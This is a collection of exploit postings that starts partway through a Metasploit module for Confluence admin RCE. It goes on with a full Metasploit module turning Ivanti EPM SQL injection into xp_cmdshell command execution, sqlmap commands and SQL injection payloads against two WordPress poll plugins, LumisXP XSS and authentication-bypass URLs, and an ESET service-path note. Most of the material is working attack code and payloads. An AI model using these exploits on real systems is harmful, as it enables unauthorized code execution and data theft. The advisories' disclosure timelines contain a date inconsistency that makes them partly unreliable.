  # @return [String] 'win' when the OS string starts with "win" (case-insensitive), else 'nix'
  # NOTE(review): `os` comes from `&.text` and may be nil when the span is
  # missing; `os.downcase` then raises NoMethodError instead of failing cleanly.
  def get_host_os
    # Elevated Confluence administrators can view system information, which will be used to confirm the target OS.
    res_sysinfo = send_request_cgi(
      'method' => 'GET',
      'keep_cookies' => 'true',
      'uri' => normalize_uri(target_uri.path, 'admin', 'systeminfo.action')
    )

    # Connection failure, no response, or malformed response.
    fail_with(Failure::Unknown, 'Target did not respond as expected while getting host OS') unless res_sysinfo

    # Confirm that the response is the expected system info page.
    fail_with(Failure::UnexpectedReply, 'The system information page failed to return the expected data') unless res_sysinfo.code == 200 && res_sysinfo.body.include?('operating.system')

    # Extract the OS string from the response DOM.
    os = res_sysinfo.get_xml_document.xpath('//span[@id="operating.system"]').first&.text
    vprint_status("Target returned the operating system string '#{os}'")

    # If the string begins with "win", assume the host is Windows. If it's anything else, assume it's something Unix-based.
    os.downcase.start_with?('win') ? 'win' : 'nix'
  end

  # Uploads a "language file" containing the ProcessBuilder expression through
  # the Code Macro admin form; the script engine evaluates it server-side.
  #
  # @param shell [String] the first two ProcessBuilder arguments as a Java literal
  #   list, chosen by the caller from get_host_os
  # NOTE(review): a nil res_upload only triggers print_error, after which
  # `res_upload.code` is still evaluated and raises NoMethodError; the second
  # print_error is therefore unreachable in that case.
  def upload_payload(shell)
    # Grab a valid macro dashboard CSRF token.
    csrf_macro = get_csrf('/admin/plugins/newcode/configure.action', 'macro')

    # Initialize a multipart form.
    payload_form = Rex::MIME::Message.new

    # ProcessBuilder string - this will inject the sh/cmd.exe sequence as the first two args and decode the base64 msf fetch payload as the third.
    payload_string = "new java.lang.ProcessBuilder(#{shell}, new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(payload.encoded)}'))).start()"

    # Add the CSRF token, payload file, and 'newLanguageName' value. Both the 'languageFile' name and the 'newLanguageName' value can be any string.
    payload_form.add_part(csrf_macro, 'text/plain', 'binary', 'form-data; name="atl_token"')
    payload_form.add_part(payload_string, 'text/plain', 'binary', "form-data; name=\"languageFile\"; filename=\"#{rand_text_hex(10)}\"")
    payload_form.add_part(rand_text_hex(10), 'text/plain', 'binary', 'form-data; name="newLanguageName"')

    vprint_status("Crafted ProcessBuilder payload string: #{payload_string}")
    vprint_status('Sending POST request to trigger code execution')

    # POST the multipart form for code execution. A neutral error will be returned in the web response, which we can ignore.
    res_upload = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'plugins', 'newcode', 'addlanguage.action'),
      'keep_cookies' => 'true',
      'ctype' => "multipart/form-data; boundary=#{payload_form.bound}",
      'data' => payload_form.to_s
    )

    # Connection failure, no response, or malformed response.
    print_error('Target did not respond as expected during code execution attempt') unless res_upload

    # If the response to the multipart request does not return a 200.
    print_error('The application returned a non-200 response during code execution attempt') unless res_upload.code == 200
  end

  # Entry point: login, confirm admin rights via admin/console.action, elevate
  # when redirected to authenticate.action, detect the host OS, then upload.
  # NOTE(review): as in elevate, `res_check_admin.headers['Location']` is
  # tested for truthiness before the .include? calls, so this method is
  # nil-safe where elevate is not.
  def exploit
    # Authenticate to Confluence.
    res_login = login(datastore['ADMIN_USER'], datastore['ADMIN_PASS'])

    # Connection failure, no response, or malformed response.
    fail_with(Failure::Unknown, 'Target did not respond as expected during authentication') unless res_login

    # If authentication does not result in a redirect with the provided "XsuccessX" 'Location' header value.
    fail_with(Failure::BadConfig, 'The target did not accept the provided credentials') unless res_login.code == 302 && res_login.headers['Location'].include?('XsuccessX')

    vprint_status('Successfully authenticated to Confluence')

    # Attempt to fetch a privileged page with the provided valid credentials to confirm the user is an administrator.
    res_check_admin = send_request_cgi(
      'method' => 'GET',
      'keep_cookies' => 'true',
      'uri' => normalize_uri(target_uri.path, 'admin', 'console.action')
    )

    # Connection failure, no response, or malformed response.
    fail_with(Failure::Unknown, 'Target did not respond as expected during privilege check') unless res_check_admin

    # If a 'Location' header is returned in the response, the current session doesn't have full privileges.
    if res_check_admin.headers['Location']

      # Confluence will redirect to the login page if the current user does not have admin privileges, so check for that here.
      if res_check_admin.headers['Location'].include?('login.action')
        fail_with(Failure::BadConfig, 'The provided credentials are valid, but the user does not have administrative privileges')
      end

      vprint_status('The provided user is an administrator')

      # Check whether Secure Administrator Sessions feature (sudo-like elevation prompt) is enabled. This feature is default on newer versions.
      if res_check_admin.headers['Location'].include?('authenticate.action')
        elevate
      end

    # User is an administrator and Secure Administrator Sessions is disabled.
    else
      vprint_status('The provided user is an administrator')
    end

    # As an administrator, check the host OS for selection between sh/cmd.exe in payload
    shell = get_host_os == 'win' ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'

    # Upload a text file containing a payload to be evaluated by the script engine
    upload_payload(shell)
  end

end
<pre><code>=====[ Tempest Security Intelligence - ADV-6/2024<br />]==========================<br /><br />LumisXP v15.0.x to v16.1.x<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents]==================================================<br /> * Overview<br /> * Detailed description<br /> * Timeline of disclosure<br /> * Thanks & Acknowledgements<br /> * References<br /><br />=====[ Vulnerability<br />Information]=============================================<br /> * Class: Improper Neutralization of Input During Web Page Generation<br />('Cross-site Scripting') [CWE-79]<br /><br /> * CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4<br /><br />=====[ Overview]========================================================<br /> * System affected : LumisXP<br /> * Software Version : Version - v15.0.x to v16.1.x<br /> * Impacts :<br /> * Vulnerability: A cross-site scripting (XSS) vulnerability in the<br />component XsltResultControllerHtml.jsp of LumisXP v15.0.x to v16.1.x allows<br />attackers to execute arbitrary web scripts or HTML via a crafted payload<br />injected into the lumPageId parameter<br /><br />=====[ Detailed<br />description]=================================================<br />* XSS [GET<br />/portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=]:<br /><br />1 - Send the link with the XSS payload inserted into the lumPageId=<br />parameter.<br /><br />```<br />GET<br />/portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=<br />```<br />2 - Verify that the payload is executed in the response.<br /><br /><br />=====[ Timeline of<br />disclosure]===============================================<br /><br 
/> 2/Apr/2024 - Responsible disclosure was initiated with the vendor.<br /> 12/Apr/2024 - LumisXP Support confirmed the issue.<br /> 16/Feb/2024 - The vendor fixed the vulnerability.<br /> 29/May/2024 - A CVE was assigned and reserved: CVE-2024-33326<br /><br />=====[ Thanks & Acknowledgements]========================================<br /> * Tempest Security Intelligence [1]<br /> * Rodolfo Tavares<br /> * Niklas Correa<br /><br />=====[ References ]=====================================================<br /><br /> [1] https://cwe.mitre.org/data/definitions/79.html<br /> [2] https://www.tempest.com.br/<br /> [3] Thanks to Filipe X.<br /><br />=====[ EOF ]===========================================================<br />--<br /><br />-- <br /><br />*Esta mensagem é para uso exclusivo de seu destinatário e pode conter <br />informações privilegiadas e confidenciais. Todas as informações aqui <br />contidas devem ser tratadas como confidenciais e não devem ser divulgadas a <br />terceiros sem o prévio consentimento por escrito da Tempest. Se você não é <br />o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste <br />caso, por favor, notifique o remetente da mesma e destrua imediatamente a <br />mensagem.*<br /><br />*<br />*<br />*This message is intended solely for the use of its <br />addressee and may contain privileged or confidential information. All <br />information contained herein shall be treated as confidential and shall not <br />be disclosed to any third party without Tempest’s prior written approval. <br />If you are not the addressee you should not distribute, copy or file this <br />message. In this case, please notify the sender and destroy its contents <br />immediately.**<br />*<br />*<br />*<br /><br /></code></pre>
<pre><code>=====[ Tempest Security Intelligence - ADV-6/2024<br />]==========================<br /><br />LumisXP v15.0.x to v16.1.x<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents]==================================================<br /><br />Overview<br />Detailed description<br />Timeline of disclosure<br />Thanks & Acknowledgements<br />References<br />=====[ Vulnerability<br />Information]=============================================<br /><br />Class: Use of Hard-coded Credentials<br />('Use of Hard-coded Credentials') [CWE-798]<br />CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - 5.3<br />=====[ Overview]========================================================<br /><br />System affected : LumisXP<br />Software Version : Version - v15.0.x to v16.1.x<br />Impacts :<br />Vulnerability: A hardcoded privileged ID within Lumisxp v15.0.x to v16.1.x<br />allows attackers to bypass authentication and access internal pages and<br />other sensitive information<br />=====[ Detailed<br />description]=================================================<br /><br />IDOR<br />http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=<br />:<br />Access the link by inserting the GUID into the lumChannelId= parameter.<br />1 - Access your target using the following GUID (<br />00000000F00000000000000000000002 )<br />```<br />http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=<br />```<br />2 - Verify that in the request response you will have access to various<br />component information and internal information about one or several domains.<br /><br />=====[ Timeline of<br />disclosure]===============================================<br /><br />2/Apr/2024 - Responsible 
disclosure was initiated with the vendor.<br />12/Apr/2024 - LumisXP Support confirmed the issue.<br />16/Feb/2024 - The vendor fixed the vulnerability.<br />29/May/2024 - A CVE was assigned and reserved: CVE-2024-33329<br /><br />=====[ Thanks & Acknowledgements]========================================<br /><br />Tempest Security Intelligence [1]<br />Rodolfo Tavares<br />Niklas Correa<br />=====[ References ]=====================================================<br /><br />[1] https://cwe.mitre.org/data/definitions/798.html<br />[2] https://www.tempest.com.br<br />[3] Thanks to Filipe X.<br /><br />=====[ EOF ]===========================================================<br /><br />--<br /><br />-- <br /><br />*Esta mensagem é para uso exclusivo de seu destinatário e pode conter <br />informações privilegiadas e confidenciais. Todas as informações aqui <br />contidas devem ser tratadas como confidenciais e não devem ser divulgadas a <br />terceiros sem o prévio consentimento por escrito da Tempest. Se você não é <br />o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste <br />caso, por favor, notifique o remetente da mesma e destrua imediatamente a <br />mensagem.*<br /><br />*<br />*<br />*This message is intended solely for the use of its <br />addressee and may contain privileged or confidential information. All <br />information contained herein shall be treated as confidential and shall not <br />be disclosed to any third party without Tempest’s prior written approval. <br />If you are not the addressee you should not distribute, copy or file this <br />message. In this case, please notify the sender and destroy its contents <br />immediately.**<br />*<br />*<br />*<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Poll Maker Plugin SQL Injection <br /># Date: 2024-07-11<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor: https://ays-pro.com/wordpress/poll-maker<br /># Version 5.3.2<br /><br /><br />1. **Access the Admin Panel:**<br /> - Navigate to the admin panel of your WordPress site.<br /> - Go to `Poll Maker > `Results` > https://localhost/wordpress/wp-admin/admin.php?page=poll-maker-ays-results&orderby=id&order=desc<br /> ```<br />3. Search for orderby parameter.<br /><br /><br />## SQLMAP COMMAND<br /><br />python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=poll-maker-ays-results&orderby=id&order=desc" --cookie="wordpress_logged_in_55e28812cb0bc43705127d62a25df794=admin|1720624086|cQgkhpgoy0ZxhQSupSHRw7bo9mxcwEWyUp0VreNnZBK|d74e12a1cdecafc50c920c18d4711826598780dd360f3a637abcc68a6086f7a3; _wp_travel_engine_session=010869411d3c5e302ccf674d9a49d453||1720689253||1720688893; wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|81237d448295de9d99b8560e6b6d9d8640f81c4dbb629e550e56860775baf0b3; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|d8d2e1da10a83ab054e39b8dfa5787c0dc2d586f364bcb584983b26efb857285; wordpress_test_cookie=WP Cookie check; wp-settings-1=editor=html; wp-settings-time-1=1720687513" --batch --dbms=mysql --threads=10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 <br /><br /><br /><br />## RESULT<br /><br />Parameter: orderby (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)<br /> Payload: page=poll-maker-ays-results&orderby=id PROCEDURE ANALYSE(EXTRACTVALUE(3054,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x58655778))))),1)# wcUc&order=desc<br /> Vector: PROCEDURE 
ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)<br />---<br /><br />---<br />[08:03:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)<br />[08:03:59] [INFO] the back-end DBMS is MySQL<br />[08:03:59] [PAYLOAD] id/**/PrOCEdUrE/**/analySE(exTRActvALuE(6707,CoNcAT(0x5c,(iF((VeRSION()/**/LikE/**/0x254d61726961444225),BenChmaRk(5000000,MD5(0x6e454541)),6707)))),1)#/**/ZrRh<br />[08:03:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions <br />do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y<br />[08:04:01] [DEBUG] used the default behavior, running in batch mode<br />web application technology: Apache 2.4.54, PHP 8.0.23<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br /><br /></code></pre>
<pre><code># Exploit Title: ESET NOD32 Antivirus 17.2.7.0 - Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Exploit Date: 2024-07-09<br /># Contact: miladgrayhat@gmail.com<br /># Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL<br /># Vendor : https://www.eset.com<br /># Version : 17.2.7.0<br /># Tested on OS: Microsoft Windows 10 pro x64<br /><br /><br />C:\Users\Ci3c0>sc qc ekrn<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ekrn<br /> TYPE : 20 WIN32_SHARE_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"<br /> LOAD_ORDER_GROUP : Base<br /> TAG : 0<br /> DISPLAY_NAME : ESET Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br /># Unauthenticated SQL injection in the EPM WSStatusEvents SOAP endpoint (CVE-2024-29824),<br /># turned into command execution through xp_cmdshell. See check and exploit below.<br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> # Raised by soap_request when the HTTP layer returns no response object. check maps it<br /> # to CheckCode::Unknown; exploit deliberately swallows it (see the comment there).<br /> class IvantiEpmRequestError < StandardError; end<br /><br /> # Module metadata plus the two options read elsewhere in this file: TARGETURI (base path<br /> # used by soap_request) and DELAY (seconds of WAITFOR DELAY used by check).<br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ivanti EPM RecordGoodApp SQLi RCE',<br /> 'Description' => %q{<br /> Ivanti Endpoint Manager (EPM) 2022 SU5 and prior are vulnerable to unauthenticated SQL injection which can be leveraged to achieve unauthenticated remote code execution.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'James Horseman', # original PoC, analysis<br /> 'Christophe De La Fuente' # Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://forums.ivanti.com/s/article/Security-Advisory-May-2024'],<br /> [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-24-507'],<br /> [ 'URL', 'https://github.com/horizon3ai/CVE-2024-29824'],<br /> [ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/'],<br /> [ 'CVE', '2024-29824']<br /> ],<br /> 'Platform' => ['windows'],<br /> 'Privileged' => true,<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Automatic Target', {}]<br /> ],<br /> 'DisclosureDate' => '2024-05-24',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> # MS SQL logs will contain evidence of `xp_cmdshell` being used<br /> # Fetch payload cannot be deleted while a Meterpreter session is active<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [ true, 'The URI of the 
EPM Web Services', '/']),<br /> OptInt.new('DELAY', [ true, 'The delay to detect if the target is vulnerable using time-based SQLi in second', 5])<br /> ]<br /> )<br /> end<br /><br /> # Builds the injected T-SQL fragment: closes the original string literal, enables<br /> # xp_cmdshell via sp_configure/RECONFIGURE, runs +cmd+ through it and comments out the<br /> # rest of the statement. +cmd+ is XML-escaped (encode(xml: :text)) because xml_payload<br /> # embeds the result in the SOAP body.<br /> # Defender note: the sp_configure change itself is a strong detection signal on the MS SQL<br /> # side, in addition to the xp_cmdshell use already listed under SideEffects.<br /> def sqli_payload(cmd)<br /> "';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC xp_cmdshell '#{cmd.encode(xml: :text)}'--"<br /> end<br /><br /> # Wraps +sqli+ in the SOAP 1.2 UpdateStatusEvents envelope; the injection point is the<br /> # md5= field of the Action status string (presumably parsed by the RecordGoodApp code path<br /> # named in 'Name' — confirm against the references). All other fields are placeholders.<br /> def xml_payload(sqli)<br /> <<~XML<br /> <?xml version="1.0" encoding="utf-8"?><br /> <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"><br /> <soap12:Body><br /> <UpdateStatusEvents xmlns="http://tempuri.org/"><br /> <deviceID>string</deviceID><br /> <actions><br /> <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string"><br /> <status>GoodApp=1|md5=#{sqli}</status><br /> </Action><br /> </actions><br /> </UpdateStatusEvents><br /> </soap12:Body><br /> </soap12:Envelope><br /> XML<br /> end<br /><br /> # POSTs the SOAP envelope for +sqli+ to WSStatusEvents/EventHandler.asmx under TARGETURI.<br /> # +timeout+ is passed straight through to send_request_cgi. Raises IvantiEpmRequestError<br /> # when no response object comes back; otherwise returns the response unchanged.<br /> def soap_request(sqli, timeout = 20)<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'WSStatusEvents', 'EventHandler.asmx'),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/soap+xml; charset="utf-8"',<br /> 'data' => xml_payload(sqli)<br /> }, timeout)<br /><br /> raise IvantiEpmRequestError, 'Failed to send the SOAP request' unless res<br /><br /> res<br /> end<br /><br /> # Time-based detection: times a WAITFOR DELAY of zero seconds, then one of DELAY seconds,<br /> # and reports Vulnerable only when the second request took longer (compared in whole<br /> # seconds) and at least DELAY seconds. Rex::Stopwatch.elapsed_time yields<br /> # [block result, elapsed seconds]; the result is discarded. The method-level rescue turns<br /> # a missing HTTP response into CheckCode::Unknown rather than an exception.<br /> def check<br /> print_status("Checking if the target is vulnerable using time-based SQLi (delay=#{datastore['DELAY']})")<br /><br /> _res, elapsed1 = Rex::Stopwatch.elapsed_time { soap_request("';WAITFOR DELAY '0:0:0';select 1--") }<br /> vprint_status("Baseline query elapsed time: #{elapsed1}")<br /><br /> _res, elapsed2 = Rex::Stopwatch.elapsed_time { soap_request("';WAITFOR DELAY '0:0:#{datastore['DELAY']}';select 2--") }<br /> vprint_status("Delayed query elapsed time: #{elapsed2}")<br /><br /> if 
elapsed2.to_i > elapsed1.to_i && elapsed2 >= datastore['DELAY']<br /> return CheckCode::Vulnerable('SQLi executed')<br /> else<br /> return CheckCode::Safe('SQLi not executed')<br /> end<br /> rescue IvantiEpmRequestError => e<br /> return CheckCode::Unknown(e.to_s)<br /> end<br /><br /> # Sends the xp_cmdshell payload once with a 1 second HTTP timeout. As the rescue comment<br /> # says, an interactive payload such as Meterpreter typically produces no HTTP response, so<br /> # the IvantiEpmRequestError from soap_request is intentionally ignored.<br /> # NOTE(review): a genuine connection failure is silently ignored here too; a vprint_status<br /> # in the rescue branch would let an operator tell the two cases apart.<br /> def exploit<br /> soap_request(sqli_payload(payload.encoded), 1)<br /> rescue IvantiEpmRequestError<br /> # Expecting no response if an interactive payload such as Meterpreter is used<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: WordPress Poll Plugin SQL Injection <br /># Date: 2024-07-06<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://total-soft.com/wp-poll/<br /># Version 2.3.6<br /><br /><br />1. **Access the Admin Panel:**<br /> - Navigate to the admin panel of your WordPress site.<br /> - Go to `TS Poll > `Create Pool ` > ` Use Theme` and save it. > https://localhost/wordpress/wp-admin/admin.php?page=ts-poll-builder&tsp-id=1<br /> ```<br />2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc<br />3. Search for orderby parameter.<br /><br /><br />## SQLMAP COMMAND<br /><br />python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc" \<br />--batch \<br />--dbms=mysql \<br />--thread=10 \<br />--no-cast \<br />--random-agent \<br />-v 3 \<br />--tamper="between,randomcase,space2comment" \<br />--level=5 \<br />--risk=3 \<br />-p orderby \<br />--cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|e111b736b22043864d0f8ea6da823ca00768a110af4da612c555add1979839d1; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|173622110c7f3812695b26c96ba4905a7c760ac41e37645150dd4869ae884c4b; wordpress_test_cookie=WP Cookie check; wp-settings-time-1=1720266472"<br /><br /><br />## RESULT<br /><br />---<br />Parameter: orderby (GET)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc<br /> Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))<br /><br /> Type: time-based blind<br /> Title: MySQL >= 
5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc<br /> Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])<br />---<br /><br /></code></pre>